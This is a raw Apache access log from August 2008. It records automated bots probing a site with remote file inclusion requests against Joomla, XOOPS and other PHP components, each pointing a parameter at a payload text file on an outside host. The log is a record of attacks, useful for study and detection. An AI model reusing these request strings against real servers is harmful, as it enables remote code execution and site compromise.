219.117.239.114 - - [10/Aug/2008:19:46:06 -0600] "GET /logs/error_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:19:46:16 -0600] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5822 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:19:46:22 -0600] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
194.79.75.195 - - [10/Aug/2008:19:46:46 -0600] "GET /tiny_includes/config.php?dir_ws=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
210.245.226.25 - - [10/Aug/2008:19:47:04 -0600] "GET /logs/access_log.20080330//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:19:47:16 -0600] "GET /logs/error_log.20080518//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:19:47:42 -0600] "GET /logs/access_log.20080518//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.803"
202.133.244.61 - - [10/Aug/2008:19:48:02 -0600] "GET /logs/access_log.20080420/index.php?page=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
202.133.244.61 - - [10/Aug/2008:19:48:03 -0600] "GET /index.php?page=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
202.133.244.61 - - [10/Aug/2008:19:48:03 -0600] "GET /logs/index.php?page=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
66.230.197.245 - - [10/Aug/2008:19:48:25 -0600] "GET /logs/error_log.20080406/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:19:48:25 -0600] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
88.191.59.190 - - [10/Aug/2008:19:48:42 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:19:48:42 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:19:48:42 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
219.117.239.114 - - [10/Aug/2008:19:49:00 -0600] "GET /logs/error_log.20080406/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:19:49:02 -0600] "GET /oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
88.191.59.190 - - [10/Aug/2008:19:49:07 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
203.121.131.7 - - [10/Aug/2008:19:49:16 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
203.121.131.7 - - [10/Aug/2008:19:49:17 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
219.117.239.114 - - [10/Aug/2008:19:49:19 -0600] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:19:49:21 -0600] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5822 "-" "libwww-perl/5.65"
89.111.172.23 - - [10/Aug/2008:19:49:21 -0600] "GET /logs/error_log.20080518//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
89.111.176.106 - - [10/Aug/2008:19:49:33 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
89.111.176.106 - - [10/Aug/2008:19:49:34 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.111.176.90 - - [10/Aug/2008:19:49:34 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
89.111.176.106 - - [10/Aug/2008:19:49:34 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.111.176.90 - - [10/Aug/2008:19:49:34 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.111.176.90 - - [10/Aug/2008:19:49:35 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:19:49:37 -0600] "GET /logs/access_log.20080518//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.805"
202.133.244.61 - - [10/Aug/2008:19:49:50 -0600] "GET /logs/access_log.20080525/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 316 "-" "libwww-perl/5.79"
89.111.179.10 - - [10/Aug/2008:19:50:02 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
89.111.179.10 - - [10/Aug/2008:19:50:02 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.111.179.10 - - [10/Aug/2008:19:50:02 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.111.176.106 - - [10/Aug/2008:19:50:13 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
89.111.176.90 - - [10/Aug/2008:19:50:14 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
89.111.179.10 - - [10/Aug/2008:19:50:19 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.111.179.10 - - [10/Aug/2008:19:50:20 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.111.176.90 - - [10/Aug/2008:19:50:21 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.111.176.90 - - [10/Aug/2008:19:50:22 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:19:50:25 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.5.163.212 - - [10/Aug/2008:19:50:25 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
194.79.75.195 - - [10/Aug/2008:19:50:27 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
194.79.75.195 - - [10/Aug/2008:19:50:27 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
89.111.176.106 - - [10/Aug/2008:19:50:30 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.111.176.106 - - [10/Aug/2008:19:50:30 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.253.223.90 - - [10/Aug/2008:19:50:34 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
193.253.223.90 - - [10/Aug/2008:19:50:34 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
89.111.179.10 - - [10/Aug/2008:19:50:39 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
84.21.71.133 - - [10/Aug/2008:19:50:45 -0600] "GET /logs/error_log.20080406/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:19:50:53 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:19:50:53 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
203.121.131.7 - - [10/Aug/2008:19:50:55 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 267 "-" "libwww-perl/5.805"
203.121.131.7 - - [10/Aug/2008:19:50:56 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 242 "-" "libwww-perl/5.805"
203.121.131.7 - - [10/Aug/2008:19:50:56 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 267 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
203.121.131.7 - - [10/Aug/2008:19:50:57 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 247 "-" "libwww-perl/5.805"
203.121.131.7 - - [10/Aug/2008:19:50:57 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 242 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.230.197.245 - - [10/Aug/2008:19:51:14 -0600] "GET /logs/error_log.20080420/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 264 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:19:51:14 -0600] "GET /logs/access_log.20080420/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
70.85.102.100 - - [10/Aug/2008:19:51:15 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
70.85.102.100 - - [10/Aug/2008:19:51:16 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
203.121.131.7 - - [10/Aug/2008:19:51:38 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 266 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:19:51:42 -0600] "GET /logs/error_log.20080608/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:19:51:43 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
202.133.244.61 - - [10/Aug/2008:19:52:24 -0600] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
89.111.172.23 - - [10/Aug/2008:19:52:25 -0600] "GET /logs/error_log.20080406//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:19:52:26 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:19:52:26 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
203.121.131.7 - - [10/Aug/2008:19:52:48 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 242 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:19:52:52 -0600] "GET /logs/error_log.20080511/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
81.9.63.18 - - [10/Aug/2008:19:52:58 -0600] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gurufocus.com/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
81.9.63.18 - - [10/Aug/2008:19:52:58 -0600] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gurufocus.com/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
66.230.197.245 - - [10/Aug/2008:19:53:08 -0600] "GET /logs/error_log.20080420/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
64.59.70.177 - - [10/Aug/2008:19:53:50 -0600] "GET /logs/access_log.20080713//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
64.59.70.177 - - [10/Aug/2008:19:53:50 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
64.59.70.177 - - [10/Aug/2008:19:53:50 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
62.169.0.50 - - [10/Aug/2008:19:53:59 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
62.169.0.50 - - [10/Aug/2008:19:53:59 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
64.59.70.177 - - [10/Aug/2008:19:54:53 -0600] "GET /logs/access_log.20080330//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
193.253.223.90 - - [10/Aug/2008:19:56:51 -0600] "GET /logs/access_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
193.253.223.90 - - [10/Aug/2008:19:56:52 -0600] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
193.253.223.90 - - [10/Aug/2008:19:56:52 -0600] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
195.5.163.212 - - [10/Aug/2008:19:57:45 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
195.5.163.212 - - [10/Aug/2008:19:57:45 -0600] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
194.79.75.195 - - [10/Aug/2008:19:57:47 -0600] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
194.79.75.195 - - [10/Aug/2008:19:57:48 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
89.111.172.23 - - [10/Aug/2008:19:57:59 -0600] "GET /logs/error_log.20080406/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:19:58:00 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:19:58:00 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
193.253.223.90 - - [10/Aug/2008:19:58:17 -0600] "GET /logs/error_log.20080518//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
70.85.102.100 - - [10/Aug/2008:19:58:37 -0600] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
70.85.102.100 - - [10/Aug/2008:19:58:37 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
70.85.102.100 - - [10/Aug/2008:19:58:37 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
70.85.102.100 - - [10/Aug/2008:19:58:37 -0600] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
67.19.51.194 - - [10/Aug/2008:19:59:54 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:20:00:06 -0600] "GET /logs/error_log.20080504//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:06 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:06 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:06 -0600] "GET /logs/error_log.20080504//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:06 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:20:00:06 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
